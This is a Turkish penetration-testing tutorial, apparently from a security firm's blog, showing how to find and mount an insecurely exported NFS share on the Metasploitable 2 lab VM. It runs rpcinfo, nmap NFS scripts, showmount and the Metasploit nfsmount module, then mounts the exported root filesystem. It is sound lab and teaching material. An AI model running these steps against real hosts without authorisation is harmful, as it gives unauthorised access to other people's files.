NMAP Betikleri, Showmount Komutu ve MSF nfsmount Auxiliary Modülü ile NFS Paylaşımlarına Erişimin Sağlanması

1
946
views
Lızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerden bir takım bilgiler elde edilebilir. Bu yazıda, Metasploitable: 2 sanal makinesi üzerinde güvenilir olarak yapılandırılmayan NFS servisi istismar edilecek ve paylaşılan veriler elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Yazıda kullanılan Metasploitable: 2 sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/metasploitable-2,29/

 

NFS (Network File System) ağdaki bilgisayarların (özellikle *NIX işletim sistemlerinin) ortak bir dosya sistemine, yerel diskleri kadar kolay ulaşmasını sağlayan, ilk olarak 1984 yılında Sun Microsystems tarafından geliştirilmiş RPC temelli dağıtık dosya sistemi yapısıdır. Böylece bir ağ üzerindeki birden fazla bilgisayarda bulunan dosyaların, tek bir sabit diskte yer alıyormuş gibi yönetilmelerini sağlar. Bunun yanında NFS servisi uygun şekilde yapılandırılmamışsa yetkisiz erişim sağlanabilir.

Not: NFS’in eski sürümlerinin güvensiz olmasının yanında yeni sürümlerinde kerberos ile kimlik doğrulama dahil bir çok güvenlik katmanı eklenmiştir.

 

1) NFS Servisinin Keşfi

IP adresi 192.168.162.131 olan Metasploitable 2 sistemindeki RPC tabanlı servislerin tespiti için rpcinfo aracı kullanılabilir.

rpcinfo -s 192.168.162.131
rpcinfo -p 192.168.162.131

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-01

 

Nmap ile ağ taramasının sonucu aşağıdaki gibidir.

nmap -pT:111,2049 -sV -Pn –open 192.168.162.131
nmap -pU:111,2049,35166 -sV -Pn –open 192.168.162.131

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-02

 

 

2) Paylaşım Dizininin Tespiti

Paylaşım dizininin tespiti için Nmap nfs-ls ve nfs-showmount betikleri, showmount komutu veya MSF nfsmount auxiliary modülü kullanılabilir.

Nmap nfs-ls betiği ile NFS üzerinden yapılan paylaşımları (dizinleri ve dosyaları) ve erişim haklarını listeler. Benzer olarak nfs-showmount betiği ile paylaşımlar listelenebilir.

nmap -p111 -Pn –open –script=nfs-ls 192.168.162.131
nmap -p111 -Pn –open –script=nfs-showmount 192.168.162.131

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-03

 

Nmap nfs-showmount betiği yerine Linux showmount komutu da kullanılabilir.

showmount -e 192.168.162.131

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-04

 

Not: “showmount” komutunun bulunmadığı istemcilerde (Kali vb), “nfs-common” paketi kurulması gerekebilir.

apt-cache search showmount
apt-get install nfs-common

 

MSF nfsmount auxiliary modülü ile de NFS paylaşımları listelenebilir. Bu amaçla öncelikle modül seçenekleri listelenir.

search nfsmount
use auxiliary/scanner/nfs/nfsmount
show options

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-05

 

IP listesi verilerek UDP 111 portu üzerindeki sorgular ile paylaşım dizini elde edilir.

set RHOSTS 192.168.162.131
run

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-06

 

Böylece tüm diskin (/) paylaşıldığı görülmektedir.

Paylaşım ayarı, NFS paylaşımının yapıldığı Metasploitable 2 sisteminin /etc/exports dosyası içeriğinde de görülmektedir.

cat /etc/exports

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-07

 

3) Paylaşıma Erişim Sağlanması

Paylaşıma erişim için mount komutu kullanılabilir.

mkdir Desktop/BaglantiDizini
mount -t nfs 192.168.162.131:/ Desktop/BaglantiDizini/ -o nolock
ls -la Desktop/BaglantiDizini/

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-08

 

Böylece paylaşım masaüstündeki bir klasöre eşleştirilmiştir.

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-09

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

1 YORUM

mete için bir yanıt yazın İptal

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.